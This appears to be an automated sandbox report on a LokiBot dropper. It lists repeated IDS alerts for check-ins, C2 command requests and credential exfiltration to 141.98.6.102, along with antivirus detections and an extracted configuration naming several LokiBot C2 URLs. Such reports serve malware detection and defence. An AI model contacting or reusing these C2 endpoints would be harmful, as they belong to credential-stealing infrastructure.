SID:	2025483
Source Port:	80
Destination Port:	49724
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497252025483 11/29/22-16:52:31.018575
SID:	2025483
Source Port:	80
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249731802025381 11/29/22-16:52:33.757391
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249722802025381 11/29/22-16:52:29.504056
SID:	2025381
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249717802024317 11/29/22-16:52:26.668343
SID:	2024317
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249723802024313 11/29/22-16:52:30.023507
SID:	2024313
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249716802025381 11/29/22-16:52:25.029133
SID:	2025381
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249719802025381 11/29/22-16:52:27.785438
SID:	2025381
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249720802024313 11/29/22-16:52:28.227779
SID:	2024313
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249725802025381 11/29/22-16:52:30.920170
SID:	2025381
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249726802825766 11/29/22-16:52:31.339365
SID:	2825766
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249718802021641 11/29/22-16:52:27.285136
SID:	2021641
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249732802825766 11/29/22-16:52:36.325135
SID:	2825766
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249727802025381 11/29/22-16:52:31.817491
SID:	2025381
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497282025483 11/29/22-16:52:32.293466
SID:	2025483
Source Port:	80
Destination Port:	49728
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249729802021641 11/29/22-16:52:32.689634
SID:	2021641
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249730802021641 11/29/22-16:52:33.273429
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249724802021641 11/29/22-16:52:30.488585
SID:	2021641
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249731802024313 11/29/22-16:52:33.757391
SID:	2024313
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249722802024318 11/29/22-16:52:29.504056
SID:	2024318
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249725802021641 11/29/22-16:52:30.920170
SID:	2021641
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249728802024318 11/29/22-16:52:32.198993
SID:	2024318
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249719802024318 11/29/22-16:52:27.785438
SID:	2024318
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249732802025381 11/29/22-16:52:36.325135
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249731802024318 11/29/22-16:52:33.757391
SID:	2024318
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249723802025381 11/29/22-16:52:30.023507
SID:	2025381
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249722802024313 11/29/22-16:52:29.504056
SID:	2024313
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249719802024313 11/29/22-16:52:27.785438
SID:	2024313
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249716802021641 11/29/22-16:52:25.029133
SID:	2021641
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497312025483 11/29/22-16:52:33.852928
SID:	2025483
Source Port:	80
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497302025483 11/29/22-16:52:33.400113
SID:	2025483
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497322025483 11/29/22-16:52:36.428850
SID:	2025483
Source Port:	80
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249728802024313 11/29/22-16:52:32.198993
SID:	2024313
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249724802825766 11/29/22-16:52:30.488585
SID:	2825766
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249729802825766 11/29/22-16:52:32.689634
SID:	2825766
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249727802024313 11/29/22-16:52:31.817491
SID:	2024313
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249723802825766 11/29/22-16:52:30.023507
SID:	2825766
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249721802024313 11/29/22-16:52:28.704063
SID:	2024313
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249724802025381 11/29/22-16:52:30.488585
SID:	2025381
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249721802024318 11/29/22-16:52:28.704063
SID:	2024318
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497272025483 11/29/22-16:52:31.911870
SID:	2025483
Source Port:	80
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497292025483 11/29/22-16:52:32.805162
SID:	2025483
Source Port:	80
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249727802024318 11/29/22-16:52:31.817491
SID:	2024318
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249729802025381 11/29/22-16:52:32.689634
SID:	2025381
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249716802825766 11/29/22-16:52:25.029133
SID:	2825766
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249719802825766 11/29/22-16:52:27.785438
SID:	2825766
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249725802825766 11/29/22-16:52:30.920170
SID:	2825766
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249717802021641 11/29/22-16:52:26.668343
SID:	2021641
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497222025483 11/29/22-16:52:29.613062
SID:	2025483
Source Port:	80
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249726802024313 11/29/22-16:52:31.339365
SID:	2024313
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249722802825766 11/29/22-16:52:29.504056
SID:	2825766
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497232025483 11/29/22-16:52:30.124555
SID:	2025483
Source Port:	80
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497262025483 11/29/22-16:52:31.441372
SID:	2025483
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249732802024313 11/29/22-16:52:36.325135
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249726802024318 11/29/22-16:52:31.339365
SID:	2024318
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249728802025381 11/29/22-16:52:32.198993
SID:	2025381
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249723802021641 11/29/22-16:52:30.023507
SID:	2021641
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249732802024318 11/29/22-16:52:36.325135
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249720802021641 11/29/22-16:52:28.227779
SID:	2021641
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249718802024318 11/29/22-16:52:27.285136
SID:	2024318
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 141.98.6.102 - Destination IP: 192.168.2.7

Timestamp:	141.98.6.102192.168.2.780497192025483 11/29/22-16:52:27.888790
SID:	2025483
Source Port:	80
Destination Port:	49719
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249729802024318 11/29/22-16:52:32.689634
SID:	2024318
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249731802825766 11/29/22-16:52:33.757391
SID:	2825766
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249729802024313 11/29/22-16:52:32.689634
SID:	2024313
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249730802024318 11/29/22-16:52:33.273429
SID:	2024318
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249730802024313 11/29/22-16:52:33.273429
SID:	2024313
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249721802025381 11/29/22-16:52:28.704063
SID:	2025381
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249724802024318 11/29/22-16:52:30.488585
SID:	2024318
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249718802024313 11/29/22-16:52:27.285136
SID:	2024313
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249720802825766 11/29/22-16:52:28.227779
SID:	2825766
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 141.98.6.102

Timestamp:	192.168.2.7141.98.6.10249724802024313 11/29/22-16:52:30.488585
SID:	2024313
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

ReversingLabs: Detection: 14%

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Avira: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Joe Sandbox ML: detected

Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sedesadre.gq/PKZ/PWS/fre.php"]}

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49716 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49716 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49716 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49716 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49716 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49717 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49717 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49717 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49717 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49717 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49718 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49718 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49718 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49718 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49718 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49718
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49719 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49719 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49719 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49719 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49719 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49719
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49720 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49720 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49720 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49720 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49720 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49720
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49721 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49721 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49721 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49721 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49721 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49721
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49722 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49722 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49722 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49722 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49722 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49722
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49723 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49723 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49723 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49723 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49723 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49723
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49724 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49724 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49724 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49724 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49724 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49724
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49725 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49725 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49725 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49725 -> 141.98.6.102:80
